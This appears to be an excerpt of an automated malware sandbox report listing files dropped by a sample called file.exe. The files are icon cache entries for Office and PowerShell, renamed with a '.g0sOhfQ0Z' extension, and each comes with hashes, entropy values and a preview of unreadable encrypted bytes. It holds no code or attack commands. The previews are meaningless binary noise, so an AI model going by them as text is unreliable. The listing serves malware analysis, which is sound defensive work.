                Preview:...mb...*...|.._`k...Y.NH.$....L#..L.B.2.T......q..].D-.M..a...f.....tv*.MtRX.....7.S..%..2..y...2...e..Q...5.M..nn2..|...`%m*..8R.2<...,.*8.{../.^.~..`.`[.^.mYa..a|...M...%.X.`ax.A..{Q4..;..hgA..}...WTo..-q%).>o(r.*..%l..@.9....l.v6.h.&.\0W.:Q.p...O....C=s.!.....X9..Y5......W;.1*.Pj1.U...Gf..g.c}.j.>X....d..Sf.......W+...+.Z...2....PF..a.SN...Z\.1<.3.>..y...c..}..XM.z.:....gb.e.....9....9....F{..&.].K..)=N..M}.[..........Q....eH?..g.r....].e.....a..l...*.?G.L..(\D.}p..\..o.SO..Z...'.."0..Q._p/=.Z.^..".m2........I...$._.B.[z....$....K02N.d..F<.E..N._@M......[.\.Pf.......Ft..~...l...0...c%8.H..kx.Sw......^s.=IB...M.?M......k..F2.)..E.Cy.%@w..B....?.".n.^H.N....o...;u.vl.V#{RR...]..!3..y.~t..m..2.....&....9Q.....Nc...e..Ye...(.}.......M.2...GTg..1..F.e.>.>h.q...<.M.G....Z.6\.r..nQ9(...9m.e.*..P....p(...`(..+/~.......Q:...JU.......z....SD....MK_j.[.7}~.H.......![/....@.$.}'..])...*?H...5.;.3.?J.t..>3.&.{.}u:9 ..W.o.<Si.Z`x[..>...'..[q... .

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}_Microsoft Office_Office16_EXCEL_EXE.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):4562
                Entropy (8bit):7.9551550755829235
                Encrypted:false
                SSDEEP:96:2LsWmdrXxbkXBMUV/VaPCffaLbeVuEQvmqgb2GHezR:2L3mdrXNkmUV/YPCfbu72o
                MD5:E96D1A68DF68C4ABE3F7763742FCE1AA
                SHA1:3EE849D2DD29CCF6039818E2173CD99BD10B8AAB
                SHA-256:C78CA4C362027A93E9DDECC67D676D9FAA64262CE8E3E910D9B9372222512C55
                SHA-512:B4925B376D4900ACD7C4E0B95EAADF3575F178343D71C26885B0B87EB326BC5E2DE3E1A978B850449A743111B6CC1F18DBE48B4BC169B2EE65933A6C1814761F
                Malicious:false
                Preview:P......,..?H...............].v..<.!..E~.^..3Kj.P^..S.6.f....~...iz.Q.`w..xN)..X..................3..5..;.u..:..<.....lQ....O.(.V...2...r..1...s....."[...A..W..s.C&.u........r.B..7Y...;....#Q.9.k...4...*Qo..?5.z.n..Y.Q..Tv.....+S.3..U.s.zf.........F..IJ..tH.Yr..q2...Yb._8]X.~.Q..$...D$.kO38.....qP)}G.(...+w7....D)..'e.\.G...<...h.....n..2N.{.3+Dl...,..*...u.:..U.l..Rv....._...+,..V7nhEB......^...=....E.".<.Nu.f..j.....;-j.s...;./....0....o..)Gr...V..u... ...U+..pu..D.N.k....].9...f1..P..<..]..1XQ.(.B..m.....R..-..j...o...\...&./J...#YE...3sCz^..H..iry..K..B.o...s.c.RX.]...mx....U.......Q.../.....S..l.J.W..!_A}.....$. /1..V._..L2....<..(.1.c..._..=X..K....D..dB..K.5..&........].d.6...O...].8.Z. ....~......;wL...+#..(....Qm..;.E.-....u.1...G.E.jL..#......SC....1....8V.3...\..D.q#Ja4........p..b.[)K.b..`[.:J....t.-..[0........)..........L..qR!d.....i..4....>.P..K..n.......Sb...,...Q....~.........g........E.;d.....C......l+...F.|..9..)..V

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}_Microsoft Office_Office16_GROOVE_EXE.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):4565
                Entropy (8bit):7.9566390129119675
                Encrypted:false
                SSDEEP:96:8I49xRqlguOGkGHOZc1KRKwVpz2nlt6VdnVk3fQFQ8qHRYe1KhRBWH+7ete2GHe9:8IkRqquU0KQkz2T6Aj0leteo
                MD5:B9A0EC7AC52D477EF4E227DE1F3647D6
                SHA1:4A66BD4C5BC87147F322C03C390FAAB7EC397363
                SHA-256:BE2D172A7A9BB3AE8FBD6C07C8D6BA0102C6420FAFE610A2DE7FADEBAB9C37D9
                SHA-512:599DB570D55DD875A3683C7F7B527D4B0AA086ECE254E9F7D38CC1AD7D8B5FF92542C3085072B86EC8CF8650BA3BFEF2FE7182BB0D691618E7022069D9026ACB
                Malicious:false
                Preview:5.A....*....au..4...a.).$faZ.vBc..U..K....oM..R..........!.a..Yke...oA.!.aC....p..h.....@3..4.0.....+&.(t......u.v_....@.#I........<.P..#3.....$^..a...*.&........`..0.o.d.o.G....8...3..I..iI1..p.=!...?.K8.f....a^.....<..s/R>q...'7P..5.H!yMA o...H...jg..|~....um..x.9>..}....G...]F.\4.8VZ..m.X...v...Q>....$,u..._O....}...VY..e._j...!f.*...k...j......oO....T..CR-.VAm.r..D............C^..*....m....t...".@y.z............o.-a.0..o..w.f.L..g.(...\.'$...J...B ..XN.F0...)....r.....fD..w....Fv...\...W..K...S.*...wO.}%..l.L....b[\ZF.P...{..gU.G...AS.8.x..H.0..b....kF.DS"..}=..A....i<Y.i.......k.$..l'J....w..........._... i.6n...Xe<..j.f..~.Q.+......:.....t..........F.[D|.Cl_(#.S.k.7..y....I.v...^lP.h..%..G....=.o.`.....*._.@..Q..G*..K.4"...V....|.....l....Z...ZJ.Y.....{$&.~..0. k-...2.h.%..u.7..............NK6T....b2.f.....DN%.(.r4....Z......g....|.v,?n;.]O|dt..7......l.o.._.V..#%.mQtWm.....4....)..Y..e+.).].>..2.vR!.....k.q;...X8..g...5$..^...J

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}_Microsoft Office_Office16_MSACCESS_EXE.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):4567
                Entropy (8bit):7.9607692321646075
                Encrypted:false
                SSDEEP:96:soAbBCtDUcS5HRwHgMgL5WjApe1882izUwZ3Nfcgmj/wGcB2GHezR:+FCBUcgRR2GW2iQU32fj/wGcBo
                MD5:BCF21B0F0C0B244AA6659F53CDA2E610
                SHA1:84C5DE0EA4DBB8B33F5DB96BBA059F62D31B5427
                SHA-256:CB68C43D9FCB799200B3262AAA927BC7D698255F2C6FB3ABBE3F042595D45D5C
                SHA-512:DBA70B1FD8C27898D949DD44D5555E308366F38F4585E0FEEF50FCAA75D6D6D0FC5A6697E490F4B5577E938EBF1BB91FF4E88A90EEA93117BEFEAD478B45E33C
                Malicious:false
                Preview:l._l......J.W1.,.B.....I.2{B...Sj...^..qMW.Dq...o.H-...B.;.p..:.k..b.-.R....s..o..#-..3D...\...qZ..O.I.$....&.q..J3..A.Fm.B...T.W...v.^_.>p3..M..e..!./^G....F..!.....6&..,d.<..Y...L.NDam.E.@(...$.....,...I.E...*..'.I..Z..z0U.G[h(..I..........j..c....g.7..Y....".w..#...?o4J..n.1..B.TZA..J....!.ud..QQ!.rv.K.%.2.............)..b...>...g...3<...6...[Qk.]..DT.ws..n.C*.5}......:....e.2uWdq....~.*q.).~....3....2.i{E%.[...?...Nu.|?...(.LT.RWf..:i..x....9......;....l.xj....PIX:..'..H...../Z....n..B.H.}W..Lx.?..!j.R..k,.Q.VmC=..nj..k.r{"....c...#.....v...w...*.\..y.A..ki.>c.p...AMw........O......[.Tyy.........[..\.F.Y.#.S...z....1..'....mv..PS....6.....a....2z@..$;..$..M.B...N..v.3.nP.I........~.#...G..Y........[...._..O..^..~q. ....3-....A.RW.....=b.@..>.*p/......G{....!..j.R>..U....k.67QMB.x.p..`\3Y......N....r7i......Dg..d.+.Wul..j.........B`.r.N..XY.....Rj.......9..K..t...?..#d.....;...lH.]..IXo?.H.&YN..|1cd9O...s.......c+FM)...ON.?;....x)..c\...T..*.c

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}_Microsoft Office_Office16_MSPUB_EXE.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):4564
                Entropy (8bit):7.9495943665036375
                Encrypted:false
                SSDEEP:96:Q1YbGGNR+K0QRvOrGyyiF1EaTAdEiJqrK8fMOEhb8L2a4Y/5Df8Ah6qa2GHezR:Q1OVT0QRG7ylUAr8r/fMxoL2apf8Cao
                MD5:E9C6FE02355653FA2ED8C20247765B42
                SHA1:E05C49EF6232D541E6A95E451FA0EF5AFCA7A2BB
                SHA-256:E2C1BB6C2078EB5203841403D0CA97ADFBE80DA4B9548E361D692E86B92F872E
                SHA-512:73E3DC84B36E963BDF3F1EAE3FB885BEC9859F7ACFDEDA0F217F325CFA83858ADACA3976F6CD402C3F42210444DEC5A681E8920BBCC99278347782CB0DB56EF9
                Malicious:false
                Preview:.a.0v... .I....A.."O.$mb..z=...|6...!.t...(L.....Jx.+....{2[d..&...d{hY.9~....R.1@.wn.Z...f..=...y.!.E`.pY`....6s.C7.?..R-..........jL.. jiA.O.S....k..V.HjiU?.Y....wL..?q.mJ:L....l.~.I6....G...@..]O.P.8..4c..-.3I.f^L?.C..&..].i,^.....U$?.G.5.!1...g../1...c......4qs2.F.Y.Tq!.m..I...../.a|....Kk......'...>....y..I..a...y.WYkqY.t.MY..T..4.e......y.")y=N.`.Y...2.k......tpR....x...........w._...S...9...+..K........T..8u.-.R5O..I.........)x......|K.....k..1.........]."e..T.&.;`4.!...;a..U....I&..).@...l.H.....5Q.<0E...a<$...=.[q.R...N.c..y....I(o..J...8Fs.E...I.0...vC}..:eC."..aC.sP...".....[qZ...Ek........qz...Iu..#..M..V..>...Y.KC.....t.X.{i...!..G......."X..Wj)Pti..y.......o}....3..br.!..7.$T..i.s......TwI.....l9....u.7_C....B.....i.p..M ...........F..bP.@J.....6i......j...34..^^...$.5c.+....m].~.IL.V..r3....C!\...,.8...WE..7.`<.1..`.=n...5G.O.j..*..Z.<W8.Ph............!&..(&..d.".z..W.+...:fMw..... ......8.&..`..M.+..=..WDN....F.^..QG.%..

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}_Microsoft Office_Office16_ONENOTE_EXE.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):4564
                Entropy (8bit):7.960686724783615
                Encrypted:false
                SSDEEP:96:6QXoHgH8EiDHumQxOAf3zeaMDAwJYOERj6h5iRkpfKjRxC41HJxwO2GHezR:fmgijgxOAf3CasJzq2fwkhI249JOOo
                MD5:FB1F0A3317858D35163D82F90BBF5AB3
                SHA1:BF5B9C4ED756CF98E745D860636A72BB4477D028
                SHA-256:57060C44F247EFACFCB964005CCC06165B95BA4F4F00FBBE3C947ECA11B3EC59
                SHA-512:55A4B34A36B3E90739F0A89F573BFF2301384EF7BF22EC7F3018206AB58671C7F890C74A7F657B979F659A9792A98620B4F243841259B5C8054A8DFFDB257ECA
                Malicious:false
                Preview:dY.Fkh.....3.........!...L6.(.7...@.Z.b.'...b.vk.."M.c..Kp..od.+.}4..~.)..$.....7UyTf%.K..l..t.](.n.T.....'x...sE..H..CL....H.&....D.2..1...Kr...r.^'.*E%Y..yJeNZl.~............-..l......\.u............i.bpdH......`S1..xV.<..=...s..ZAJ.QR2R..1.R?[.F..\ ..R..~N......../......."r....P=.......cF..c~....3M. ..c.'..L9{.........KK.....XQ.fs../..ov...`.j....6....?..Hj......:f....xnZ..j.S.#../.E..$y...z.(LU..M...;..[.LK ..A.a..iS.c...'..!..;+.e.t;.f$.rSDmK......pd..O.UO.t.p.S..P....%....'..IehX.QY...|..^:k...E./......@.....P..B...eJ....9!|Bt.v.8.yV.0....fi.D<.K....1O....~!...hv...>.*.*ccS.Deb+..W._B.a:.i.I......4f.H`.&....em...h.K.Y9...QU.....eW....B..Y6..(.|.?r:.....3.=.PG..i{v......r.$.8.q..7..^...G9.*.z..2..T..vFm...(.Z.T..mu..!.....c.'.v.R....,..c\..r.d-...a...hP....C.....(...l(....Z.|..^.x+?r(8./........V)h..AS.N..&bi..;..oKW$...2....').+....X....".V....-.`..B..h...9aR..+*...Au0..|....H(..Q}.E.=.._..w......Q..B]...d..u.0...2CU.0...p......

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}_Microsoft Office_Office16_OcPubMgr_exe.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):4568
                Entropy (8bit):7.959189808524023
                Encrypted:false
                SSDEEP:96:nPvNXjYAf+2kHR57Ths+NzvN8TCbxxFO23NgMxFiCH64t2GHezR:n9Yi+2uRlTOoz2t23NrxvH64to
                MD5:49D2DA816F6FBB62844A11D6BA13187A
                SHA1:E3BF68C538CE5F282F5EA2DAA9B03F1C4D473268
                SHA-256:B5D4E3BF2A40ED3BB1B50002C49CF191FDE390618FC2ABE76E62957E4FA3A48D
                SHA-512:007EA2A08AFD12D049BB099D69E425A0FA72DA24CA38C333EF401228B0165147EA8BC341DE7D8E112361A44B9DDEC7A570EC28A0B540528907D7884EF6C9F76B
                Malicious:false
                Preview:..../.L5z.?..N.V.....D..Uz"w..D..OG.y.....SxrH.....3.5..].#.......`......K......nS.<.y...V....".{.8.T19..}..8l@.x"..3GIo?...k...M...(F;.$c8!.u.J7. ..>..^|.IE...........G.a,....t.j...U.....t.h....!.Y....-.w.N#...(...Y.VO.D......1.....?c..cM.E..)...K....ar6/.......l.h.$..6.n$..lU15...8..=d.Q..8.....~..8KB&...+......&J.P....se*.xh=.....l......a.Q$!..'. .......f....X .Mi.:..Y.....q....T..P.m.....c%Pic..f>..7le[....V.JL..4..E..+."a.\..Z.n...........J|.`.. ...H..a..1.Q...oe..m9%.'.B..Q3O=.wZP...UW'....o.S.*?+b.<........V..K.|1RG.u.../N..~..o<L.Im..`.n.....`8..v.D.....].L..F.E...=$...FR-..."..v...ab.0.(.....1........x......h....[?*........ .5...a...y.nM...w.}~_."....6.....!..T.BX[.*8........C%.JB..9.....-8x...}~f..wA.c.l)&})K....b..E........[z..Z.n.......@.'.....n.r.~.6/.GU..{.u*...'.yw..QT.^.....wJ.VFa.......K.q3r..`Y......]..X.2...=...d..DBG.....u.^v0.Mm...-..!"...5h.....u.L...0.?[.x.9..f.D.C.Q.G.....S5..?]..M..Ug...S..<h...j|..W.........A.../+...

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}_Microsoft Office_Office16_POWERPNT_EXE.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):4568
                Entropy (8bit):7.955694522639514
                Encrypted:false
                SSDEEP:96:ddAv2yWjb+zdyv1qoicie5dtWGdNa1DMLseF9Lt2GHezR:ddWxWjbxvzT35dnS1csa9Lto
                MD5:4A7358720DBFD7DD2C6F2DF86875CBE2
                SHA1:72983B9FF296D67042A4E4610EDE88E6F5ED30DB
                SHA-256:28821C880770060003E5739FDBD535D8F11FAC906CE008C407F73349234DEC55
                SHA-512:80846C839A2207762257BA812B5ABA1E6925BD0D38F2E5C25AD65D1DF74F450B0A66A6C7610EBB574B3D7C5A36755BE37BB244ED9BBC3BBBC2B891339D6E33FC
                Malicious:false
                Preview:.j._.P...O..'..&...B0....H..a..h.K.(Gc....1....m...@R.V...85n....t!w!D..M.0M.=V.....S-...r......!.x...%.<j)aX.%.C.....Z.a.E..p...;.5..N'.c....|.^d!.x.R.l.6..@.s..W......`..]UbJ.9.......>-.UF.a".&xD........x.U.;N...Q..2..,Bw....2m.b.0...hK..ewW.JM,...jtf"..WX..jO~+...7,X..u:,.X,...k2+..x.1w..A.......wY..+....t.BD... 3.>.......Yc......Kt.w..S+.O0..d..zd.<h.bbC:..5Y."M_.....!.+..A..x/.u.n.D<.....*.. ..}uA.Yb.....J'....3P....,......7....;.......,(z....2.<w:...4...q^^. .S.....A.rR....Fx.WYn.#.{...g..".R.y..+<.Yg.^/y.Q$m.7 .x.g..m.c %.x.0..4..}....$.A..=e..Zl...E +.Q... olt5..........|.R...P...7j%.k...js.%6'...(........R4../...w.........vp*.N....B........o...A..{2.G.y?\:..B5k.D...C!.!...| X..g.....~9I..P_f.u..s..R.8U:.(b.7..}.u.`.w....2/...5QG.....0)!..d.r..x.w.q.A))........x..^^..,.Z.Y#q|..u..C.x..$R......Y.....r.j...w..V...I......_}.k...&O@>..e..j.b/.y7WI'<......f......X.ah.o]..@....W.b.......ZY...Wz..0.c..m.L..V........9U.Q..&....3:.{.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}_Microsoft Office_Office16_WINWORD_EXE.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):4569
                Entropy (8bit):7.955019664757899
                Encrypted:false
                SSDEEP:96:fXyoLyBWP9Z0z86zblRI1Swaaeec/6IOLEGS0H/L12GHezR:fXyyyWP9Z0z3pRoSwme5vIhy1o
                MD5:5D7E46904755FD04BCF576455E3D24C6
                SHA1:F96C699A3DA7735687D19E24BB8B862F3FE0508D
                SHA-256:3F6C47DA1511E1467863FEE68B23A35A1258AC70B0EE757174E430E8A4041A6F
                SHA-512:36A3D9CD0B408824D2A70709AF2FD0B138A026FBB108A86DE51DD4B3BB8D1A3663613C405784F87E0793062C85DF6596FC97E351664416F384E6FC17C6BB3976
                Malicious:false
                Preview:.......#jJu..R"..*~..d...Y.+./#p....v,.....7%`.7."z..<...a3....7g 9;...H. )...1......e7.t.u....n..........4..w....@.....A...=.O..D..=..y.Z.Aj.."..N....(L|...e.3|F.L.}...G._.M.cm.D..../..W.-..9|..Q.8.&...O..d.#......s .1..\".t....\q.{P.....;.n..1..|<.\.J...SO.`.5.H/....;l.....4f...r~..J....Y..O...+.M^...z.`LP...R............}...+..F.A.p.V......}l<}..;bvK1......(.....F..Z...~..EV.4M..H.........R5.^n.H=s./4..r8._G.....n....L.f.YQ.].OW9..K..".'#.8Y6..{....9N..h..b.(m.)".....h..4-.54............OQ.`+.r1.......%..0...,.Vo..Bv.....~....4fo......Fe...7Xy..:....|.Z.D..yi.]Fs....X........V. .;F.J<..=u..0p..7qW.<.e...<....:.n......_{S.....\(..lle.X.._.Ck}O.^.:....7.7..\..C.4..... 2......"'..).+.^m[c.3x..v..k....%..{O~U.....R3....]...x.Z.<U..A....C.y.a{y...0<..z3.....\u.>.v..k......'../....wi..)...=.m.....5j..........YJWL@0;.x".q|..l..\....B-iB....JD.x.Ss(D>:.....I.Q.?.d .......:."R.<...3..@`.....y.k ..uX._p..`.e...)...72._......=;(..j..0v.~......

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}_Microsoft Office_Office16_lync_exe.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):4564
                Entropy (8bit):7.963089097127745
                Encrypted:false
                SSDEEP:96:YLfeGx2wWH5pSy7yd1qoOK3Etb1KRDre80/quoFEB7yUWxHk5r0lzt2GHezR:Iel5fyLOAQb1K5C80FaEpT8u+xo
                MD5:5C25F3B65ED1CBA0BD2C06642B3F3CF5
                SHA1:96AE9751913072B312A0DD44DCB666CDAFA5077E
                SHA-256:433A5F8FA0E28E36C1F5ECD500E5BD3DD587DB7541815446CAF26AF1FD7F6C2D
                SHA-512:CC834F66361D7A6BF8E8A50CAC85BFA0183817D08A8B353CE240A2DFC2065291D23BE1CB188DD003E8B96B8E92C577A1AE170E579CC3973BF9ECF2FAF8F6F2F2
                Malicious:false
                Preview:...[U.... ~.F..(|.r(..%.....:....f.Q..JY.Q.9Y)F...R.`...M..mm.1..........)....8...(.pp..g..XC0.F7..C..S..Z9.P.F._n/X....g-..v5..eQ....6..l...:B]...Qw.9.........*......._.?..6....0...U.Z...._....]..1.K...<.w[..s.pa...emR...,R..R..r9.-.$..4.G.J/../eK.....h..;c..W......".9....g'k.+w.YO2.....4..iy.]dRHm....h...r..C.=t...Bh........@..S{.X..2.E..........QHv.9..D... .'.3..:.....f.}...@.=:.+.F.i?..mdA[...eE0]..6J.T.,....(....m...#.&B......\Q...+....X....Bc_...".....b..1....l.w.0...S8t.W*&o.l..9...7.wm...%+...|.2*q....v....^.MS...o$EX.%.;.".....6.c.....Ae.<.N..t@..{]...g........0;U.S...+.Z....b..*,....Q....)K...3...W...d..6.h...,.5...B....IM..`.A?.FlX....D. ..DL.mz....2..4..._... .."f....Y......f(.l)'.p.U..0z.9.Em..n..N.|.....Q.'}....{....M.a_J...\@.4.].4....pC.....m.<U.c.."..j.]....k......DR.T."...{i.2..:..?+.2...1g.....xH.k..sat.z.?..l"..hE..9.x..P.NC..o....?..._hH...V..<NhL.7.....Wh= /...z..*.jU..{..YU...D..F%4..6'p%.0.1_.g..R..ou.kl...

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}_Microsoft Office_Office16_msoev_exe.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):4563
                Entropy (8bit):7.9630016051407315
                Encrypted:false
                SSDEEP:96:KDzt/fH+p3O4Y7/CTJT9IISnU1JXiGq91sGggeum5lOLnA3GradWn2GHezR:KDzJH+44Y7/6anCJX1q9bmT4nA3Grsao
                MD5:8E5270CE74FC1B4549D21F6035BBEC10
                SHA1:F81D763EB6142CFC5C3EF7E0A531BC44BCF9C77F
                SHA-256:39E57B4C8B2A13F73D8F1A5F13E1BD19759B9805924E3B8FB60477DC90C725D2
                SHA-512:C8C71B2576507C22227CC2106C413CE97D3E7060240D25E7FBA8CB1ADCF7ECD061A2011170B1506CA6C156E12F3E08D7C374F3F275B7D4BC3AA41B1BC93A5A1E
                Malicious:false
                Preview:@.^&.D......C.*aCHD.H....Xk..HZ8.P&.3+cZ.L5.D...`9T...'=.....u.:=R...D..x..D.N.y......=...I..i".......~.M..#V.p.Y38..........U../g..=.$...#0n..0..6fLF..]...%:%R.e$.c..s.H."U.o...k..........M....... .22..A...!I.!...]........z..).3.(..5....^...[}.KC.....{c.g......d.*#..E.c.T....Dt.U].....&.N.J#.qYjg..C:.U5..._K.m.u..:...?..^.|...l.j.Gu....J....n.b:.:.D....."y....<.W..=&.....^/.c...~8.n.:.W...KoSiX...W..%.%....l?....U.W.-..:.k.w).X..f..=@q:.g7.g..}.\.~W........i.......{i..m|...X.c...p;.1...........'...+..:8P...@.ov+.P%....7#.#...q....5........*....0.......>..d..._..ku..0...........S...JrYKZ.-..........Q....v....E.r..,.....e.kJW<.I+.j......!Q.(?/...h..!...QO..2&........K.....Nd7...=.........+..<...............WY..H..X.9s ...b,.R.. ... ..@........n..b1U.%...F..P-.-.vQQ...........C".FI.....4.R.%.&....R..c...|.......f..l..i?.#.'K.?.>la..Y.....M)..i..|.8......b$....z.R.2....3.f..m...[..*i.....).?.._3\..qz\.....MX.Gn..`hs...N.....YP...;B......

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}_Microsoft Office_Office16_msotd_exe.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):4563
                Entropy (8bit):7.959249359354676
                Encrypted:false
                SSDEEP:96:8bySa7oBH8HtF9DmjH/XAWXnsmTsWLlsusJgDO7PQUX20mW672GHezR:8bo78YrhmTXBnsmTsqsusJgDO7ZbmW6M
                MD5:A57DBFBC695A55389BAFA92F8CF82121
                SHA1:5D0B9323339F5D1304397B23B462FF1D96518FBD
                SHA-256:4CD224FAB55ABF64E7DDEE9778BD5E4234E4F4BA8D775F5CFDA260B4A427606B
                SHA-512:1102916CF0F7F08DD8327F2AEDDE50ECEC6436484A195AD506B975BB5A0077EC78B6A0F916F6019E4FB7D7B88FE714DAF477BF0BD9C903E1D8CFF77694814D35
                Malicious:false
                Preview:.fH..7.b.O...b..v.u*.9Q.z. ..d....p.T.=..O.......N.......a.......y5.....Oy#..F/n... (F..X......+.|k.X.V...3..|T..&jI.pj.......B.8.{.Nqr.V....s...&].K7 h...g(.'......C.`5......H....+.......5@W..V.....c.QV.J....Z..:......*5.M/n..]O.".d......j%.).q...&.M.U|.M.:.N2.7.o6...Y....(I...D.O..k....Qk.V.N..i......t.........f.L.R$.!...+z\....!.....WQ.Q....+..=zw.g}*.....aq..E.....V...HB.....g..z..{'b.w..r...........lN.I.0B.X.........M.'.......|.h.;7.6n]...r.hb.X.......D.&].KD...e....Q.e(1.:.^.K.&.6.N.._~.....A.+..z.5D(........^s...nS...O..U...".>.....-.K.........T..$8.[...u.+j...F..j..J)S.7bS.>7.`.n.b._NK. ..%<..jKstJF...%/..t.+3.e.\V...Y.ks...#.3q.WJ.....w....8...m,w..-\<b.BR..-!D....j ^.". ...f.~.....g.......~...rV..he..Jc..>..q-..P..I.E^.PM..$......S...@s......."BB...U*u.....v......]u.....zy2/....."o`+M1.l{..V3...9........et..^.Z..g5A-.e.V.......n.a.Vu....p..N'....-.Vqvo........j....z........_.!{.u..X....b".9A*a0|.....d(l......7.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}_WindowsPowerShell_v1_0_PowerShell_ISE_exe.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):4568
                Entropy (8bit):7.956713674695592
                Encrypted:false
                SSDEEP:96:EFW/2TODRTefJOvJeR/WcwpROrHslf2qX4CoeTLqp16pG/AeTOjt2GHezR:EFwrTSox6/WcwpROLslf2qIeTev6UvOy
                MD5:E08D6D34F1CA594F82DAF02D2115F2E2
                SHA1:11F18C43A70296FD5167A667A022D2BC5205E74C
                SHA-256:7D713B7470166CE3AF57CE9A02603977D6B062067C61D2873AB68E95343D3CA9
                SHA-512:5EE477ECD99E5B8D5790D5ABFEF92F9505E3474D8D4AD8F5B4624EBFB8525DB7AB6DB119A9BFB6757904E91FE06C67132D4A51E06F64E549CDB1AC0C7869F968
                Malicious:false
                Preview:NU.pc)."P....@y.~T..ol...3.....H...wc<..w.ue.K..<H.u...5..I..;....)C.Tg+t.@...n....q~5..&...DQ..0........SU...|."e0.8... x......[.G..4....>4.......q....7:..........p9.!.}..uM.."\.....e.....t.......2&l*...$....W.........k.9%.N.\..#`...c..4t4+..m.9..'b..LR}...]sJ....lB9t.4y....b.f.hD..}.Y....Y.d.hIz.....eU.."+V..2Q..hp.e..!..M..U+;Z.W}.Y.aLd.JW..nx.O..;>!(...L....Q5..R.j.......q.3`.../..0gKl..mi6..U....=2.K..1~.h..g..}"...]~.......HOBd..['<.h#.1.P...._......^Ol../.g..aN8........D...:9.)....8..fm..`c.>x..$........-W.7..X..n....Sp...|)r..e..(..5..P.*?.~.....e........X..n.:...`..D....[...'.y9.h*...m>....IoB....k...U..OK.<..O....%.+...K<..N....2..4./....T..?.NJ. X.m.#B.......k.Y.O.tU..;...l.P.&.).....0..D...*.j..{..8.$..5....].@....Z.._z.I..{G..TD..Rx4.e..:S&$.P....wHp....._.3..V..k..".....+A....!Xl~>L..........x..W.....5zu..6[.E'....p..q..Hg.........P_!.9S.mC[..Fe............`.C.a...'i...u..]$e.5U..q.>.w.\.g....XM[s..S.c.%uk|..i.M...0.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}_WindowsPowerShell_v1_0_powershell_exe.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):4566
                Entropy (8bit):7.9607103537468396
                Encrypted:false
                SSDEEP:96:iuQNRlpTpswrvAMFBonG3P5eakrrChOjDi7bSqUgnSdvXy2GHezR:iTlp9lTAE6GfxkrWGdtvXyo
                MD5:B03CC1CB8C16AC66A8A0E8AD017E6498
                SHA1:6660AA9504E3BBB878C269E13E7E671636B90A52
                SHA-256:24B06FE8F8EB4A2476919F904B31F8602932948D90105B381534065BA198ED94
                SHA-512:6A1E1D17B21FF123E396434BE277917FBD48B8B5E7B8B5F79CB8989B36203F753969A16FD15200F98B8A615D68EE9C55F94345CEFAF5F18196453B768F17A3EB
                Malicious:false
